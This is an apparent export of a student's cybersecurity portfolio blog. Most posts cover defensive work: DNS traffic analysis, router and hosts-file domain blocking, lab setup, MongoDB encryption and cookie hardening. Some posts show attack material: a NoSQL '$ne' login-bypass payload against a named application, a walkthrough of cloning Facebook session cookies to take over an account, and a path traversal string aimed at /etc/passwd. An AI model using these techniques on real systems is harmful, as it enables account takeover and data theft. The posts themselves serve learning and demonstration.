project directly addresses System Integrity by establishing the \u0026ldquo;Known Good\u0026rdquo; state of a network. By developing the ability to recognize abnormal DNS patterns and C2 communication, I provided a proactive defense that identifies compromises before data exfiltration occurs. This work demonstrates the practical value of traffic monitoring in detecting early indicators of compromise and informing a multi-layered remediation strategy.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/network-baselining-anomaly/","summary":"Objective: To establish a behavioral baseline for legitimate network traffic and use protocol analysis to isolate potential security threats.\n","tags":["Wireshark","Network Monitoring","Indicators of Compromise","Traffic Analysis"],"categories":["Network \u0026 Infrastructure Security"],"tools":["Wireshark","DNS","TLS","Anomaly Detection"]},{"title":"Centralized Network Security via Router-Level Filtering","content":"Objective: To implement non-device-specific security controls by enforcing domain blocking at the network gateway.\n1. The Vulnerability: Device-Level Mitigation Gaps Relying solely on host-based security measures (like the Windows hosts file) creates significant coverage gaps for non-configurable devices. Mobile phones, tablets, and IoT hardware often lack accessible system files for manual domain blocking. This leaves a portion of the network exposed to Command-and-Control (C2) communications and phishing traffic if a threat originates from or targets these \u0026ldquo;unmanaged\u0026rdquo; devices.\n2. Technical Execution: Gateway URL Filtering I utilized the MTN 4G Router Admin Panel to establish a centralized defense layer. By configuring IPv4 URL Keyword Filtering, I instructed the router to intercept and drop traffic destined for the suspicious domains identified during the Wireshark analysis phase. This method ensures that the security policy is enforced at the network boundary, regardless of the operating system or configuration of the connected endpoint.\nComponent Value Purpose Hardware MTN 4G Router The central gateway for all local network traffic. Control Logic URL Keyword Filtering Blocks traffic based on domain strings. Protocol IPv4 The addressing scheme used for the filtering rules. Coverage Network-Wide Protects all connected Windows, Mobile, and IoT devices. 3. Execution Workflow Perimeter Analysis: Identified that blocking domains on a single PC did not prevent the same malicious domains from being accessed by mobile devices on the same Wi-Fi. Gateway Access: Authenticated into the home router\u0026rsquo;s administrative interface to access the firewall and security settings. Rule Configuration: Added identified malicious strings (e.g., aoneroom.com, givefreely.com, trasre.com) to the URL Filtering List. Validation: Verified that the router successfully blocked requests to these domains from multiple device types, confirming a robust, centralized defense. 4. Key Logic # Logical Rule applied via GUI: IF (HTTP_REQUEST_URL CONTAINS \u0026#34;malicious_domain.com\u0026#34;) THEN (ACTION = BLOCK/DROP) 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the MTN router firewall interface and the initial empty filtering rules before configuration.\nRESOURCES_NODE_01 Caption: Results phase showing the active URL Filtering List with ten suspicious domains successfully blocked at the network level.\n6. Professional Impact This project demonstrates an understanding of Defense-in-Depth and the importance of securing the network perimeter. By moving the control point to the router, I protected the System Integrity of the entire local environment, significantly reducing the attack surface. This proactive approach mitigates the risk of lateral movement and ensures a consistent security posture across a diverse range of hardware.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/router-level-filtering/","summary":"Objective: To implement non-device-specific security controls by enforcing domain blocking at the network gateway.\n","tags":["Network Security","Firewall","Gateway","IoT Security"],"categories":["Network \u0026 Infrastructure Security"],"tools":["MTN 4G Router","URL Filtering","IPv4","Firewall"]},{"title":"Automated Domain Blocking via Batch Scripting","content":"Objective: To develop a reusable and scalable automation tool for neutralizing network threats at the system level.\n1. The Vulnerability: Manual Mitigation Inefficiency Relying on manual entries to the Windows hosts file for domain blocking is a slow and error-prone process. In an active threat scenario where multiple malicious domains (e.g., trasre.com, shallspark.com) are identified, the delay in manual configuration increases the window of opportunity for malware to establish a Command-and-Control (C2) connection or exfiltrate data.\n2. Technical Execution: Scripted Host Redirection I developed a batch script using the VS Code IDE to automate the redirection of suspicious traffic. The script programmatically appends the local loopback address (127.0.0.1) to the Windows hosts file for every identified malicious domain. This ensures that any application attempting to reach these external servers is immediately redirected back to the local machine, effectively \u0026ldquo;cutting off\u0026rdquo; the communication.\nComponent Value Purpose Language Batch (.bat) Native Windows execution for system-level changes. Target File %SystemRoot%\\System32\\drivers\\etc\\hosts The system file that maps hostnames to IP addresses. Logic Append (\u0026raquo;) Ensures existing host mappings are preserved while adding new blocks. Loopback IP 127.0.0.1 The address used to nullify malicious outbound requests. 3. Execution Workflow Requirement Analysis: Identified the need for a scalable way to deploy domain blocks across multiple machines after discovering a cluster of suspicious domains in Wireshark. Script Development: Authored the @echo off script to target the system’s drivers directory and map the identified domains to localhost. Redundancy Check: Included both root domains and \u0026ldquo;www\u0026rdquo; subdomains in the script to ensure comprehensive coverage. Verification \u0026amp; Unblocking: Developed a secondary \u0026ldquo;unblock\u0026rdquo; script to restore original host settings for testing and maintenance purposes. 4. Key Commands :: Snippet of the block-suspicious-domains.bat script @echo off set hostspath=%SystemRoot%\\System32\\drivers\\etc\\hosts echo 127.0.0.1 sparkle0.com\u0026gt;\u0026gt; %hostspath% echo 127.0.0.1 trasre.com\u0026gt;\u0026gt; %hostspath% echo Done! The domains have been blocked. pause 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the logic and domain list within the IDE before execution.\nRESOURCES_NODE_01 Caption: Results phase showing the successful system-level mapping of malicious domains to the loopback address after script execution.\n6. Professional Impact This project significantly improves System Integrity by reducing the time-to-remediate for known network threats. By moving from manual entry to automation, I ensured consistent protection across the environment and reduced human error. This demonstrates an ability to translate threat intelligence into actionable, scalable security infrastructure.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/automated-domain-blocking/","summary":"Objective: To develop a reusable and scalable automation tool for neutralizing network threats at the system level.\n","tags":["Automation","Security Engineering","C2 Mitigation","Endpoint Security"],"categories":["Network \u0026 Infrastructure Security"],"tools":["Batch Scripting","VS Code","Windows Hosts File"]},{"title":"Network Traffic Analysis \u0026 Automated Threat Mitigation","content":"Objective: To identify suspicious network traffic using protocol analysis and implement multi-layered blocking mechanisms to secure a local environment.\n1. The Vulnerability: Malicious External Communication During live monitoring of network traffic, I identified several suspicious domains, such as googleagmanger.com and aoneroom.com, which exhibited characteristics of Command-and-Control (C2) infrastructure. These domains utilized CDN IP rotation to evade traditional security controls and performed frequent DNS resolution attempts, suggesting the presence of adware, tracking scripts, or persistent backdoors.\n2. Technical Execution: Protocol Interrogation I utilized Wireshark to perform granular packet inspection, isolating abnormal DNS queries and tracking the CNAME chaining used by attackers to obscure their true server locations.\nComponent Value Purpose Analysis Tool Wireshark Real-time packet capture and DNS log inspection. Mitigation 1 Windows Hosts File System-level redirection of malicious domains to 127.0.0.1. Mitigation 2 Batch Scripting Automation of the blocking process for speed and scalability. Mitigation 3 Router Filtering Network-wide protection via URL keyword filtering. 3. Execution Workflow Traffic Baselining: Monitored legitimate traffic (e.g., Google, Firebase) to establish a behavioral baseline for routine, secure communications. Threat Identification: Flagged domains mimicking legitimate services (typosquatting) and those showing repeated queries to unknown subdomains. Local Nullification: Manually updated the Windows hosts file to redirect traffic from identified malicious domains to the local loopback address. Automation \u0026amp; Scalability: Developed a reusable batch script to automate the host file updates, reducing manual error and deployment time. Network-Wide Enforcement: Configured the MTN 4G Router firewall to block these keywords at the gateway, protecting non-Windows devices like mobile phones and IoT hardware. 4. Key Commands :: Automated domain blocking script snippet @echo off set hostspath=%SystemRoot%\\System32\\drivers\\etc\\hosts echo 127.0.0.1 googleagmanger.com\u0026gt;\u0026gt; %hostspath% echo 127.0.0.1 aoneroom.com\u0026gt;\u0026gt; %hostspath% 5. Evidence of Work RESOURCES_NODE_01 Caption: Identification of suspicious DNS queries and rotating CDN IPs in Wireshark logs.\nRESOURCES_NODE_01 Caption: Centralized network-wide blocking of malicious domains at the router boundary to secure all connected devices.\n6. Professional Impact This project demonstrates a Defense-in-Depth mindset. By combining local system-level modifications with centralized network-wide filtering, I ensured that no single point of failure would compromise the environment. I successfully neutralized communication channels for potential data exfiltration and confirmed the effectiveness of the remediation through continuous monitoring.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/network-traffic-analysis-mitigation/","summary":"Objective: To identify suspicious network traffic using protocol analysis and implement multi-layered blocking mechanisms to secure a local environment.\n","tags":["Wireshark","DNS","C2","Defense-in-Depth"],"categories":["Network \u0026 Infrastructure Security"],"tools":["Wireshark","Windows Hosts File","Batch Scripting","Router Filtering"]},{"title":"Defensive Lab Environment \u0026 Network Configuration","content":"Objective: To design and deploy a secure, isolated virtualization environment for controlled penetration testing and vulnerability analysis.\n1. Technical Overview Before any testing occurs, a \u0026ldquo;sandbox\u0026rdquo; must be established. This ensures that exploits do not \u0026ldquo;leak\u0026rdquo; onto the public internet or the local home network. For this project, I utilized Oracle VirtualBox to create a private Host-Only Network.\n2. Architecture Components Attacker Machine: Kali Linux (Rolling Edition) Target Machine: Metasploitable 2 (Linux-based vulnerable sinkhole) Network Type: Host-Only (vboxnet0) Network Range: 192.168.56.0/24 3. Implementation Steps Interface Initialization: I identified and activated the virtual network adapter on the Kali host to ensure a communication path to the target. Kernel Module Troubleshooting: I resolved issues with the VirtualBox Guest Additions and networking modules using modprobe to ensure the virtual bridge was stable. Connectivity Verification: Performed a bilateral ping test to confirm that the machines could \u0026ldquo;see\u0026rdquo; each other without external interference. 4. Key Commands Used ip addr show vboxnet0: To verify the Attacker IP (192.168.56.1). sudo modprobe vboxnetflt: To manually load the VirtualBox net-filter driver during a service failure. ping -c 4 192.168.56.101: To confirm the route to the target. RESOURCES_NODE_01 Caption: Verification of the isolated Host-Only network interface and successful connectivity to the target environment.\n5. Security Reflection Setting up a Host-Only network is a core requirement for Ethical Hacking. It demonstrates a commitment to \u0026ldquo;Safety First\u0026rdquo;—ensuring that vulnerable services (like the ones on Metasploitable) are never exposed to the actual internet where they could be hijacked by real malicious actors.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/defensive-lab-environment/","summary":"Objective: To design and deploy a secure, isolated virtualization environment for controlled penetration testing and vulnerability analysis.\n","tags":["VirtualBox","Networking","Isolation","Lab Setup"],"categories":["Network \u0026 Infrastructure Security"],"tools":["VirtualBox","Kali Linux","Host-Only Networking"]},{"title":"Network Security Fundamentals and Threat Assessment","content":"Objective: To conduct a comprehensive study of network threat vectors and security controls to establish a foundational defense strategy for organizational environments.\n1. The Vulnerability: Diverse Attack Surface Modern networks face a broad spectrum of vulnerabilities ranging from ARP Poisoning and Man-in-the-Middle (MITM) attacks to Social Engineering and Zero-Day exploits. Without a structured understanding of these threats, security measures often remain reactive rather than proactive, leaving critical assets exposed to reconnaissance and unauthorized access.\n2. Technical Execution: Layered Security Framework I performed a deep-dive analysis into network security measures, categorizing them into physical, technical, and administrative layers. This involved studying the specific functions of various security tools—such as Stateful Inspection Firewalls, VPNs, and Network Segmentation—to determine how they collectively defend against the identified threat landscape.\nComponent Value Purpose Firewalls Packet Filtering \u0026amp; WAF Monitors and controls traffic based on predefined security rules. Encryption AES / RSA / ECC Secures data at rest and in transit via cryptographic protocols. Access Control NAC / Zero Trust Validates users/devices and enforces the principle of least privilege. Monitoring SIEM / Behavioral Analytics Aggregates logs and uses AI to detect anomalies indicating threats. 3. Execution Workflow Threat Research: Analyzed 15 distinct network threats, including Buffer Overflows, DDoS attacks, and Phishing, to understand their operational mechanics. Security Measure Mapping: Evaluated 18 different security controls and tools, determining their specific roles in protecting system integrity and data. Environment Setup: Applied these foundational concepts to a personal PC and home network setup to monitor traffic and implement local firewall rules. Outcome Evaluation: Verified the effectiveness of these measures by differentiating between safe and suspicious traffic patterns using live capture tools. 4. Key Commands # Commands used to audit local firewall and network configuration # Checking the status of Windows Defender Firewall netsh advfirewall show allprofiles # Listing active network connections and associated processes netstat -ab 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the comprehensive classification and description of modern network attack vectors.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the structured framework of defensive tools and concepts required to secure a network.\n6. Professional Impact This project demonstrates a rigorous academic and practical grasp of System Integrity and organizational defense. By successfully mapping threats to specific security controls, I have established a methodology for building a robust security posture that addresses the CIA Triad (Confidentiality, Integrity, and Availability). This structured approach is vital for remediation planning, as it allows for the deployment of targeted defenses like Segmentation and Encryption to mitigate high-risk vulnerabilities.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/network-fundamentals-assessment/","summary":"Objective: To conduct a comprehensive study of network threat vectors and security controls to establish a foundational defense strategy for organizational environments.\n","tags":["Network Security","Risk Management","CIA Triad","Defense-in-Depth"],"categories":["Network \u0026 Infrastructure Security"],"tools":["Firewalls","VPNs","Encryption","SIEM"]},{"title":"Database Encryption \u0026 Sensitive Data Protection (MongoDB)","content":"Objective: To implement Client-Side Field-Level Encryption (CSFLE) in a NoSQL environment to ensure that sensitive user data remains encrypted even if the database is compromised.\n1. The Vulnerability: Plaintext Data Exposure in NoSQL Databases Storing personally identifiable information (PII) or financial data in plaintext within a NoSQL database (like MongoDB) represents a critical security risk. If an attacker gains unauthorized access to the database layer, they can exfiltrate the entire data store, leading to a massive loss of Data Confidentiality. Traditional disk-level encryption is insufficient to protect data from a compromised database process.\n2. Technical Execution: Client-Side Field-Level Encryption I implemented a \u0026ldquo;Never-Plaintext\u0026rdquo; architecture using MongoDB’s Field-Level Encryption (FLE). By encrypting specific sensitive fields (e.g., credit_card, social_security_number) at the application layer before they reach the database, I ensured that the data remains unreadable to anyone without the original encryption keys, including database administrators.\nComponent Value Purpose Encryption Type AES-256-GCM (Symmetric) Industry-standard algorithm for data protection. Key Strategy Master Key + Data Keys Hierarchical key management for scalability. Storage Engine MongoDB The NoSQL backend protected by the encryption layer. Process CSFLE (Client-Side) Encrypting data before it ever leaves the client app. 3. Execution Workflow Security Audit: Identified critical data fields within the MongoDB schema that required mandatory encryption according to compliance standards (e.g., PCI-DSS). Key Generation: Established a secure Key Vault to store \u0026ldquo;Data Encryption Keys\u0026rdquo; (DEK), managed by a central \u0026ldquo;Master Key.\u0026rdquo; Logic Implementation: Integrated the MongoDB driver with the encryption library, ensuring that the application automatically transparently encrypts and decrypts targeted fields. Validation: Confirmed that queries for sensitive data performed by unauthorized users or directly via the database console returned only ciphertext. 4. Key Configuration // Example: Configuring MongoDB Field-Level Encryption Schema const schemaMap = { \u0026#34;medical_db.patients\u0026#34;: { \u0026#34;bsonType\u0026#34;: \u0026#34;object\u0026#34;, \u0026#34;properties\u0026#34;: { \u0026#34;ssn\u0026#34;: { \u0026#34;encrypt\u0026#34;: { \u0026#34;keyId\u0026#34;: [UUID], \u0026#34;algorithm\u0026#34;: \u0026#34;AEAD_AES_256_CBC_HMAC_SHA_512-Deterministic\u0026#34; } } } } }; 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the initial vulnerability where sensitive fields were stored in plaintext.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the successful implementation of field-level encryption, with the database console displaying only encrypted values.\n6. Professional Impact This project highlights a \u0026ldquo;Zero-Trust\u0026rdquo; approach to database security. By ensuring that sensitive fields are never stored in plaintext, I protected the organization\u0026rsquo;s Data Confidentiality against both external hackers and internal threats. My implementation of Client-Side Field-Level Encryption ensures that the data remains secure throughout its entire lifecycle—during transit, in memory, and on disk.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/database-encryption-mongodb/","summary":"Objective: To implement Client-Side Field-Level Encryption (CSFLE) in a NoSQL environment to ensure that sensitive user data remains encrypted even if the database is compromised.\n","tags":["Database Security","Encryption","MongoDB","Data Privacy"],"categories":["Application Security (AppSec)"],"tools":["MongoDB","AES-256","Field-Level Encryption","Key Management"]},{"title":"NoSQL Injection \u0026 Database Poisoning (Vouched Application)","content":"Objective: To identify and exploit NoSQL injection vulnerabilities within the \u0026ldquo;Vouched\u0026rdquo; application to bypass authentication and extract sensitive user data.\n1. The Vulnerability: NoSQL Command Neutralization (CWE-943) NoSQL injection occurs when an application fails to properly sanitize user input before using it in a database query. In document-oriented databases like MongoDB, this allows an attacker to inject logical operators (e.g., $gt, $ne) to manipulate the query logic, leading to unauthorized data access or authentication bypass.\n2. Technical Execution: Logic Manipulation Using Postman, I crafted malicious JSON payloads targeting the authentication and search endpoints of the Vouched application. By replacing standard string inputs with MongoDB operator objects, I successfully manipulated the database logic to return records that should have been restricted, effectively bypassing Bcrypt-hashed password checks.\nComponent Value Purpose Attack Vector JSON Payload Injection Injecting MongoDB operators into API requests. Target Endpoint /api/v1/login Attempting to bypass password verification. Impact Authentication Bypass Gaining access to any user account without a password. Remediation Schema Validation Implementing strict typing for all incoming data. 3. Execution Workflow Endpoint Enumeration: Used Postman to identify API endpoints that accept JSON input for database queries. Operator Testing: Injected basic logical operators (e.g., {\u0026quot;$ne\u0026quot;: null}) to test if the database would return unintended results. Authentication Bypass: Crafted a login request where the password field was replaced with a \u0026ldquo;not equal\u0026rdquo; operator, allowing login as any user whose username was known. Data Exfiltration: Leveraged the injection vulnerability on search endpoints to dump the entire user collection. 4. Exploit Payload (JSON) // Malicious Login Payload { \u0026#34;username\u0026#34;: \u0026#34;admin\u0026#34;, \u0026#34;password\u0026#34;: { \u0026#34;$ne\u0026#34;: \u0026#34;wrong_password\u0026#34; } } // This bypasses the Bcrypt check because the query returns the first user // where the password is NOT \u0026#34;wrong_password\u0026#34;. 5. Evidence of Work RESOURCES_NODE_01 Caption: Initial discovery phase showing the identification of NoSQL-vulnerable endpoints in the Vouched application.\n*Caption: Successful authentication bypass via Postman (Left) and the subsequent database audit configuration analysis (Right).* 6. Professional Impact This project highlights a critical oversight in modern web development. While Bcrypt provides strong hashing, it cannot protect against logic-level vulnerabilities if the query itself is compromised. To remediate this, I recommended the implementation of strict Mongoose schemas and the use of query sanitizers to ensure that user input is never interpreted as a database operator.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/nosql-injection-vouched/","summary":"Objective: To identify and exploit NoSQL injection vulnerabilities within the \u0026ldquo;Vouched\u0026rdquo; application to bypass authentication and extract sensitive user data.\n","tags":["NoSQL Injection","MongoDB","API Security","Vouched"],"categories":["Application Security (AppSec)"],"tools":["Postman","MongoDB","Express.js","Bcrypt"]},{"title":"Secure Session Architecture \u0026 Defensive Flag Implementation","content":"Objective: To implement a \u0026ldquo;Secure-by-Design\u0026rdquo; framework for web applications to neutralize cookie-based attack vectors.\n1. The Vulnerability: Exposure of Unprotected Session Tokens Web applications that fail to use specific security flags leave their users vulnerable to both local and network-based cookie theft. This project addresses the Integrity and Confidentiality of the user session by architecting a defense that prevents tokens from being accessed by client-side scripts or intercepted over insecure channels.\n2. Technical Execution: Layered Cookie Defense (Vouched Platform) I developed a remediation roadmap specifically tailored for the Vouched identity platform (https://app.vouched.id) that utilizes advanced browser security features and server-side logic to protect session identities. By implementing a multi-layered defense strategy—including the use of the SameSite attribute and HttpOnly flags on the Vouched portal—I effectively neutralized the primary methods attackers use to steal session data, ensuring session integrity during identity verification flows.\nComponent Value Purpose Transport Security HSTS / HTTPS Encrypts session data during transmission. Security Flag HttpOnly Prevents JavaScript from accessing the cookie. Security Flag SameSite=Strict Blocks cross-site request forgery (CSRF) access. Session Logic Cookie Rotation Limits the window of exposure for any single token. 3. Execution Workflow Threat Assessment: Analyzed real-world session breach scenarios to prioritize high-risk assets within the Vouched portal. Flag Deployment: Configured the application server to automatically set Secure and HttpOnly flags on all outgoing session cookies across https://app.vouched.id. Input Validation: Implemented strict server-side input sanitization to block XSS payloads that might attempt to exfiltrate Vouched session data. Management Optimization: Established aggressive session timeouts and mandatory token rotation to ensure that compromised Vouched cookies have a limited lifespan. 4. Key Commands // Example of a Secure Session Cookie Configuration in a Web Application Set-Cookie: sessionID=xyz789; Secure; HttpOnly; SameSite=Strict; Max-Age=3600; 5. Evidence of Work Caption: Technical implementation of device-bound session tokens and HttpOnly/SameSite cookie flags in the Vouched application.\nYour browser does not support the video tag. VIDEO EVIDENCE: Demonstration of cookie security preventing session cloning between different browsers (Chrome vs Opera).\n6. Professional Impact This project demonstrates a proactive Security Operations mindset. By establishing these architectural safeguards, I protected the organization\u0026rsquo;s System Integrity and maintained customer trust. My remediation plan ensures that even in the event of an XSS vulnerability, the core session token remains inaccessible to attackers, significantly reducing the success rate of complex session hijacking attempts.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/secure-session-architecture/","summary":"Objective: To implement a \u0026ldquo;Secure-by-Design\u0026rdquo; framework for web applications to neutralize cookie-based attack vectors.\n","tags":["Session Security","Defense-in-Depth","Cookie Flags","Web Architecture"],"categories":["Application Security (AppSec)"],"tools":["HSTS","HTTPS","HttpOnly","SameSite","WAF"]},{"title":"Session Hijacking via Automated Cookie Exfiltration","content":"Objective: To demonstrate the ease of unauthorized cookie acquisition and subsequent account compromise using browser-based exfiltration tools.\n1. The Vulnerability: Insecure Session Management (CWE-693) Cookie theft, or session hijacking, occurs when a malicious actor acquires a user’s session tokens to gain unauthorized access to their authenticated state. This project highlights a critical breakdown in Data Confidentiality, where a lack of secure cookie flags or the presence of XSS allows attackers to \u0026ldquo;clone\u0026rdquo; a legitimate session without ever needing the user\u0026rsquo;s password.\n2. Technical Execution: Identity Impersonation (Facebook Target) I performed a live demonstration of the \u0026ldquo;cloning\u0026rdquo; process targeting a Facebook account using a browser-based cookie editor to exfiltrate and reuse session tokens. By manually extracting the critical authentication cookies (c_user and xs) from an active session, I proved that an attacker can inject these into a completely different browser (e.g., moving from Chrome to Opera) and maintain persistence without ever needing the victim\u0026rsquo;s password.\nComponent Value Purpose Attack Vector Cookie Sniffing / XSS Methods used to acquire session data. Primary Tool Cookie Editor Extension Facilitates viewing, copying, and injecting cookies. Risk Level High Direct path to account takeover and data breach. End Result Identity Theft Successful impersonation of the target user. 3. Execution Workflow Tool Setup: Integrated a professional cookie editor into my primary browser (Chrome) and a clean secondary browser (Opera). Reconnaissance: Logged into a target Facebook account and utilized the editor to identify session-critical cookies, specifically isolating the c_user (user ID) and xs (session secret) values. Exfiltration \u0026amp; Injection: Extracted these valid cookie values from Chrome and injected them manually into the Opera browser instance to simulate a remote attacker\u0026rsquo;s environment. Validation: Navigated to facebook.com in the Opera browser. The platform immediately granted full authenticated access to the victim\u0026rsquo;s profile without prompting for a password or 2FA. 4. Logical Attack Flow # Logical Attack Flow (Facebook Token Cloning): 1. Target: Authenticated Facebook Session 2. Exfiltrate: Extract `c_user` = \u0026#34;10008...\u0026#34; and `xs` = \u0026#34;45%3A...\u0026#34; 3. Action: Inject cookies into Attacker_Browser (Opera) 4. Result: Navigate to facebook.com -\u0026gt; Immediate access granted. 5. Evidence of Work RESOURCES_NODE_01 Caption: Initial identification of session cookie attributes and the setup of the exfiltration environment.\nYour browser does not support the video tag. VIDEO EVIDENCE: End-to-end demonstration of session token exfiltration and identity bypass.\n6. Professional Impact This project illustrates a catastrophic loss of Authentication integrity. I proved that a single stolen session token can lead to total account takeover, exposing sensitive financial and personal data. To remediate this, I documented the critical need for monitoring Unusual Login Patterns and Suspicious Session Activity, such as logins from new devices or unexpected geographical locations.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/session-hijacking-cookie-exfiltration/","summary":"Objective: To demonstrate the ease of unauthorized cookie acquisition and subsequent account compromise using browser-based exfiltration tools.\n","tags":["Cookie Theft","Session Hijacking","Web Security","Identity Theft"],"categories":["Application Security (AppSec)"],"tools":["Cookie Editor Extension","Browser Debugging","XSS"]},{"title":"Insecure Direct Object Reference (IDOR) \u0026 Path Traversal Discovery","content":"Objective: To identify and verify directory traversal vulnerabilities that allow unauthorized access to sensitive system files.\n1. The Vulnerability: Path Traversal (CWE-22) The web application was found to be vulnerable to Path Traversal (also known as Directory Traversal) because it failed to properly sanitize user-supplied input used to reference files on the server. This flaw allows an attacker to use special characters, such as ../, to break out of the intended web root directory and access restricted files or directories elsewhere on the file system.\n2. Technical Execution: Resource Interrogation I utilized OWASP ZAP to identify parameters susceptible to path manipulation. By injecting traversal sequences into the column parameter of the target URL, I observed the application\u0026rsquo;s response to determine if it would disclose file paths or system-level error messages.\nComponent Value Purpose Vulnerable Parameter column The input vector used for path manipulation. Risk Level High Potential for full system file disclosure. Detection Method Active Scanning Automated probing of parameters for traversal flaws. Tool OWASP ZAP Facilitates the identification of insecure file referencing. 3. Execution Workflow Automated Reconnaissance: Initiated an Active Scan within OWASP ZAP to systematically test the application\u0026rsquo;s URL parameters for traversal vulnerabilities. Alert Analysis: Flagged a \u0026ldquo;Path Traversal\u0026rdquo; alert which indicated that the application was improperly handling input in the column parameter. Payload Verification: Analyzed the attack vector to confirm that the technique could potentially reach directories residing outside the web primary folder. Context Evaluation: Noted the request URLs and parameters where the vulnerabilities were flagged to determine the scope of the exposure. 4. Key Commands # Example of a traversal payload identified during the scan # This attempts to move up the directory tree to reach system files ../../../../etc/passwd # The targeted URL identified by ZAP http://localhost:8080/WebGoat/SqlInjectionMitigations/servers?column=..%2F..%2F 5. Evidence of Work RESOURCES_NODE_01 Caption: Identification of the Path Traversal alert and the vulnerable parameter in OWASP ZAP.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the technical description of the attack and the input vector (URL Query String) identified by the tool.\n6. Professional Impact This project highlights a critical risk to Data Confidentiality and System Integrity, as an attacker could potentially read sensitive configuration files or credentials stored on the server. To remediate this, I recommended that the application validate user input against a known \u0026ldquo;allow-list\u0026rdquo; of expected values rather than relying on sanitizing malicious sequences. Furthermore, I advised ensuring that the application process runs with the least privilege necessary to prevent access to sensitive operating system files.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/idor-path-traversal-discovery/","summary":"Objective: To identify and verify directory traversal vulnerabilities that allow unauthorized access to sensitive system files.\n","tags":["IDOR","Path Traversal","Vulnerability Discovery","Web Security"],"categories":["Application Security (AppSec)"],"tools":["OWASP ZAP","WebGoat","Active Scanning"]},{"title":"Vulnerability Analysis and Remediation Planning","content":"Objective: To systematically document discovered web vulnerabilities and provide actionable, code-level remediation strategies for development teams.\n1. The Vulnerability: Insecure Coding Practices (OWASP Top 10) Through manual and automated testing of the WebGoat environment, I identified a series of high-impact vulnerabilities including SQL Injection, DOM-based XSS, and CSRF. These flaws stem from a fundamental lack of Input Validation and Sanitization, the use of unsafe JavaScript sinks, and the absence of unique anti-forgery tokens. Collectively, these represent a high risk to application security and user data.\n2. Technical Execution: Remediation Strategy Development I performed a \u0026ldquo;Post-Mortem\u0026rdquo; analysis for each identified flaw, moving beyond mere discovery to professional remediation planning. This involved analyzing the backend and frontend source code to pinpoint the exact line of failure and developing secure code alternatives to neutralize the attack vectors.\nComponent Value Purpose Frameworks Spring Security / Django Recommended for built-in CSRF protection. JS Library DOMPurify Recommended for sanitizing HTML when rendering is necessary. Query Method Prepared Statements Used to replace vulnerable string concatenation. DOM Method .text() Replaced the vulnerable .html() method to render plain text. 3. Execution Workflow Evidence Collection: Captured high-resolution screenshots of OWASP ZAP alerts and manual exploitation results to serve as proof of work. Impact Assessment: Documented how each vulnerability was discovered and translated the technical flaw into a business risk (e.g., account compromise, data leakage). Remediation Mapping: Cross-referenced alerts with OWASP documentation and official cheat sheets to ensure industry-standard fixes. Developer Guidance: Wrote clear, code-based recommendations for developers, including \u0026ldquo;Before\u0026rdquo; (vulnerable) and \u0026ldquo;After\u0026rdquo; (secure) code examples. 4. Key Commands // Example of the recommended \u0026#34;Secure Fix\u0026#34; for SQL Injection // Using Parameterized Queries to prevent user input from being executed as code PreparedStatement ps = conn.prepareStatement(\u0026#34;SELECT * FROM user_data WHERE first_name = ? AND last_name = ?\u0026#34;); ps.setString(1, \u0026#34;John\u0026#34;); ps.setString(2, lastName); // Safe: lastName is treated as a literal string 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the detailed technical description of the vulnerability and the suspected database backend.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the structured professional recommendations for mitigating session-based attacks.\n6. Professional Impact This project demonstrates my ability to act as a bridge between security testing and software development. By providing evidence-based reports and technical fixes, I ensure the Confidentiality, Integrity, and Availability of the application. My recommendations focus on proactive defense, such as implementing Content Security Policy (CSP) and Parameterized Queries, which provide long-term value by preventing entire classes of vulnerabilities.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/vulnerability-remediation-planning/","summary":"Objective: To systematically document discovered web vulnerabilities and provide actionable, code-level remediation strategies for development teams.\n","tags":["Remediation","Secure Coding","Vulnerability Management","Defensive Strategy"],"categories":["Application Security (AppSec)"],"tools":["Spring Security","DOMPurify","Prepared Statements","CSP"]},{"title":"Automated Web Application Vulnerability Discovery","content":"Objective: To utilize automated scanning tools to perform comprehensive reconnaissance and identify high-risk web vulnerabilities within an authenticated session.\n1. The Vulnerability: Presence of Known Attack Vectors (OWASP Top 10) During the initial assessment, the web application was found to host multiple critical security flaws, including SQL Injection, Cross-Site Scripting (XSS), and CSRF. These vulnerabilities represent systematic failures in input validation and session management, which, if exploited, could lead to unauthorized data access or the execution of malicious scripts in the browsers of legitimate users.\n2. Technical Execution: Automated Passive \u0026amp; Active Scanning I utilized OWASP ZAP (Zed Attack Proxy) to perform a structured vulnerability assessment of the WebGoat environment. By routing browser traffic through ZAP, I conducted passive scans to identify header-level issues and active scans to probe input parameters for injection-based flaws.\nComponent Value Purpose Scanning Engine OWASP ZAP Automation of vulnerability detection and traffic interception. Test Environment WebGoat Target application for hands-on security testing. Proxy Configuration localhost:8080 Facilitates the interception of requests for real-time analysis. Scan Type Active Scanning Dynamically testing input fields with malicious payloads. 3. Execution Workflow Environment Setup: Launched the WebGoat application via the command line and verified availability on the local host. Interception Configuration: Configured the browser to use OWASP ZAP as a local proxy and imported the ZAP CA certificate to ensure visibility into HTTPS/encrypted traffic. Passive Discovery: Interacted with various application modules while ZAP performed background analysis of request and response headers. Active Probing: Triggered the ZAP Active Scanner on the application tree to systematically test parameters for high-impact vulnerabilities like SQLi and Path Traversal. 4. Key Commands # Launching the vulnerable application via CLI java -jar webgoat-2025.3.jar # Verifying the listener port is active netstat -ano | findstr 8080 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the successful initialization of the target environment and proxy listener.\nRESOURCES_NODE_01 Caption: 